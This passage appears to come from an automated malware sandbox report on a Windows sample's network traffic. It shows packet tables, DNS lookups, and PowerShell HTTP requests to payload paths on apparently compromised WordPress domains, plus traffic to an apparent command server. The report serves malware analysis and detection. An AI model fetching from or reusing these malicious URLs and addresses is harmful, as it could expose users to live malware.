Jan 6, 2021 15:49:02.327191114 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327218056 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327241898 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327260971 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.327265978 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327280045 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.327296019 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327308893 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327342033 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327377081 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327380896 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.327403069 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.327404022 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327434063 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327441931 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.327445984 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327478886 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.327866077 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.600389957 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600416899 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600435019 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600455046 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600472927 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600488901 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600507021 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600523949 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600541115 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600555897 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600583076 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600595951 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600626945 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.600675106 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.600809097 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600828886 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600846052 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600852013 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.600863934 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600881100 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600883007 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.600898981 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600919008 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600919008 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.600936890 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600953102 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600956917 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.600970984 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.600992918 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601197958 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601218939 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601239920 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601242065 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601259947 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601277113 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601285934 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601294994 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601313114 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601329088 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601331949 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601349115 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601351023 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601366997 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601398945 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601402998 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601427078 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601445913 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601447105 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601463079 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601480961 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601485014 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601499081 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601516008 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601516008 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601535082 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601541042 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601552010 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601562023 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601568937 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601573944 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601574898 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601593971 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601596117 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601610899 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601620913 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601627111 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601641893 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601643085 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601660967 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.601660967 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601686954 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601691961 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.601705074 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.872734070 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.872769117 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.872786045 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.872802973 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.872818947 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.872833967 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.872853994 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.872894049 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.872925997 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.872951031 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.872961998 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.872982979 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.872996092 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873014927 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873075008 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873111963 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873122931 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873137951 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873138905 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873158932 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873174906 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873193026 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873209000 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873214960 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873222113 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873229027 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873248100 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873259068 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873264074 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873271942 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873282909 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873301983 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873307943 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873317003 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873325109 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873358965 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873373032 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873393059 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873403072 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873472929 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873477936 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873509884 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873549938 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873589039 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873722076 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873739958 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873769999 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873788118 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873801947 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873804092 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873828888 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873859882 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873892069 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.873898029 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.873935938 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.874021053 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:03.208470106 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:03.208518028 CET	49166	80	192.168.2.22	104.27.144.251
Jan 6, 2021 15:49:03.209023952 CET	49165	80	192.168.2.22	104.18.61.59
Jan 6, 2021 15:49:17.980114937 CET	49169	80	192.168.2.22	5.2.136.90
Jan 6, 2021 15:49:18.052706003 CET	80	49169	5.2.136.90	192.168.2.22
Jan 6, 2021 15:49:18.052840948 CET	49169	80	192.168.2.22	5.2.136.90
Jan 6, 2021 15:49:18.053646088 CET	49169	80	192.168.2.22	5.2.136.90
Jan 6, 2021 15:49:18.053714991 CET	49169	80	192.168.2.22	5.2.136.90
Jan 6, 2021 15:49:18.125869989 CET	80	49169	5.2.136.90	192.168.2.22
Jan 6, 2021 15:49:18.125998974 CET	49169	80	192.168.2.22	5.2.136.90
Jan 6, 2021 15:49:18.198823929 CET	80	49169	5.2.136.90	192.168.2.22
Jan 6, 2021 15:49:18.198899984 CET	49169	80	192.168.2.22	5.2.136.90
Jan 6, 2021 15:49:18.270879984 CET	80	49169	5.2.136.90	192.168.2.22
Jan 6, 2021 15:49:18.482275009 CET	80	49169	5.2.136.90	192.168.2.22
Jan 6, 2021 15:49:19.007164955 CET	80	49169	5.2.136.90	192.168.2.22
Jan 6, 2021 15:49:19.007412910 CET	49169	80	192.168.2.22	5.2.136.90
Jan 6, 2021 15:49:19.008038044 CET	80	49169	5.2.136.90	192.168.2.22
Jan 6, 2021 15:49:19.008132935 CET	49169	80	192.168.2.22	5.2.136.90
Jan 6, 2021 15:49:19.080705881 CET	80	49169	5.2.136.90	192.168.2.22
Jan 6, 2021 15:49:19.080993891 CET	49169	80	192.168.2.22	5.2.136.90
Jan 6, 2021 15:50:24.003638029 CET	80	49169	5.2.136.90	192.168.2.22
Jan 6, 2021 15:50:24.003979921 CET	49169	80	192.168.2.22	5.2.136.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2021 15:48:57.839204073 CET	52197	53	192.168.2.22	8.8.8.8
Jan 6, 2021 15:48:57.901670933 CET	53	52197	8.8.8.8	192.168.2.22
Jan 6, 2021 15:48:58.042258024 CET	53099	53	192.168.2.22	8.8.8.8
Jan 6, 2021 15:48:58.117547989 CET	53	53099	8.8.8.8	192.168.2.22
Jan 6, 2021 15:48:58.275434017 CET	52838	53	192.168.2.22	8.8.8.8
Jan 6, 2021 15:48:58.443938017 CET	53	52838	8.8.8.8	192.168.2.22
Jan 6, 2021 15:48:58.793539047 CET	61200	53	192.168.2.22	8.8.8.8
Jan 6, 2021 15:48:59.806623936 CET	61200	53	192.168.2.22	8.8.8.8
Jan 6, 2021 15:49:00.820825100 CET	61200	53	192.168.2.22	8.8.8.8
Jan 6, 2021 15:49:00.852129936 CET	53	61200	8.8.8.8	192.168.2.22
Jan 6, 2021 15:49:00.867592096 CET	49548	53	192.168.2.22	8.8.8.8
Jan 6, 2021 15:49:01.216911077 CET	53	49548	8.8.8.8	192.168.2.22
Jan 6, 2021 15:49:01.864855051 CET	53	61200	8.8.8.8	192.168.2.22
Jan 6, 2021 15:49:02.878700018 CET	53	61200	8.8.8.8	192.168.2.22

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 6, 2021 15:49:01.865103006 CET	192.168.2.22	8.8.8.8	d00a	(Port unreachable)	Destination Unreachable
Jan 6, 2021 15:49:02.878844976 CET	192.168.2.22	8.8.8.8	d00a	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 6, 2021 15:48:57.839204073 CET	192.168.2.22	8.8.8.8	0x8c10	Standard query (0)	wpsapk.com	A (IP address)	IN (0x0001)
Jan 6, 2021 15:48:58.042258024 CET	192.168.2.22	8.8.8.8	0x644c	Standard query (0)	sofsuite.com	A (IP address)	IN (0x0001)
Jan 6, 2021 15:48:58.275434017 CET	192.168.2.22	8.8.8.8	0xd372	Standard query (0)	veterinariadrpopui.com	A (IP address)	IN (0x0001)
Jan 6, 2021 15:48:58.793539047 CET	192.168.2.22	8.8.8.8	0x26d4	Standard query (0)	shop.elemenslide.com	A (IP address)	IN (0x0001)
Jan 6, 2021 15:48:59.806623936 CET	192.168.2.22	8.8.8.8	0x26d4	Standard query (0)	shop.elemenslide.com	A (IP address)	IN (0x0001)
Jan 6, 2021 15:49:00.820825100 CET	192.168.2.22	8.8.8.8	0x26d4	Standard query (0)	shop.elemenslide.com	A (IP address)	IN (0x0001)
Jan 6, 2021 15:49:00.867592096 CET	192.168.2.22	8.8.8.8	0xad13	Standard query (0)	khanhhoahomnay.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 6, 2021 15:48:57.901670933 CET	8.8.8.8	192.168.2.22	0x8c10	No error (0)	wpsapk.com		104.18.61.59	A (IP address)	IN (0x0001)
Jan 6, 2021 15:48:57.901670933 CET	8.8.8.8	192.168.2.22	0x8c10	No error (0)	wpsapk.com		172.67.141.14	A (IP address)	IN (0x0001)
Jan 6, 2021 15:48:57.901670933 CET	8.8.8.8	192.168.2.22	0x8c10	No error (0)	wpsapk.com		104.18.60.59	A (IP address)	IN (0x0001)
Jan 6, 2021 15:48:58.117547989 CET	8.8.8.8	192.168.2.22	0x644c	No error (0)	sofsuite.com		104.27.144.251	A (IP address)	IN (0x0001)
Jan 6, 2021 15:48:58.117547989 CET	8.8.8.8	192.168.2.22	0x644c	No error (0)	sofsuite.com		172.67.158.72	A (IP address)	IN (0x0001)
Jan 6, 2021 15:48:58.117547989 CET	8.8.8.8	192.168.2.22	0x644c	No error (0)	sofsuite.com		104.27.145.251	A (IP address)	IN (0x0001)
Jan 6, 2021 15:48:58.443938017 CET	8.8.8.8	192.168.2.22	0xd372	No error (0)	veterinariadrpopui.com		209.59.139.39	A (IP address)	IN (0x0001)
Jan 6, 2021 15:49:00.852129936 CET	8.8.8.8	192.168.2.22	0x26d4	Server failure (2)	shop.elemenslide.com	none	none	A (IP address)	IN (0x0001)
Jan 6, 2021 15:49:01.216911077 CET	8.8.8.8	192.168.2.22	0xad13	No error (0)	khanhhoahomnay.net		210.86.239.69	A (IP address)	IN (0x0001)
Jan 6, 2021 15:49:01.864855051 CET	8.8.8.8	192.168.2.22	0x26d4	Server failure (2)	shop.elemenslide.com	none	none	A (IP address)	IN (0x0001)
Jan 6, 2021 15:49:02.878700018 CET	8.8.8.8	192.168.2.22	0x26d4	Server failure (2)	shop.elemenslide.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

wpsapk.com

sofsuite.com

veterinariadrpopui.com

khanhhoahomnay.net

5.2.136.90

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	104.18.61.59	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 6, 2021 15:48:57.967911959 CET	0	OUT	GET /wp-admin/v/ HTTP/1.1 Host: wpsapk.com Connection: Keep-Alive
Jan 6, 2021 15:48:58.024018049 CET	1	IN	HTTP/1.1 200 OK Date: Wed, 06 Jan 2021 14:48:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=de2876672bcbcdd728808aa62968722701609944538; expires=Fri, 05-Feb-21 14:48:58 GMT; path=/; domain=.wpsapk.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 0779c533930000c78de12e6000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ow%2BEdcA0hnkcTf1dBi0xXRvrWH3VOIW%2BK21C9CdsfFqCJZJMBLtlkKFsU1b4dMNENHuTwzVkCg026Kyq3pcVC43UdNvBEGHdD1l3"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60d63e328d89c78d-AMS Data Raw: 31 30 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e Data Ascii: 10d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,in
Jan 6, 2021 15:48:58.024074078 CET	3	IN	Data Raw: 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f Data Ascii: itial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css"
Jan 6, 2021 15:48:58.024130106 CET	4	IN	Data Raw: 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 6c 69 6e 6b 20 68 61 73 20 62 65 65 6e 20 66 6c 61 67 67 Data Ascii: "> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p>
Jan 6, 2021 15:48:58.024188995 CET	5	IN	Data Raw: 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66 2d 77 72 61 70 70 65 72 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c Data Ascii: v>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm
Jan 6, 2021 15:48:58.024229050 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	104.27.144.251	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 6, 2021 15:48:58.169449091 CET	6	OUT	GET /wp-includes/2jm3nIk/ HTTP/1.1 Host: sofsuite.com Connection: Keep-Alive
Jan 6, 2021 15:48:58.263324022 CET	7	IN	HTTP/1.1 200 OK Date: Wed, 06 Jan 2021 14:48:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dc467b40ca2426d4ae5e3b082f502241e1609944538; expires=Fri, 05-Feb-21 14:48:58 GMT; path=/; domain=.sofsuite.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 0779c5346500004137e3040000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=mZ0jGpA21SV18U4HmHz5l8SvLhXhMditcFDSVGEPv8a%2Bi64Cu5fayEWVXubzbCp4KTVOAI3wbxjapp26XruKduUoK%2BdMb8Ip93PSu6w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60d63e33caed4137-PRG Data Raw: 31 30 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 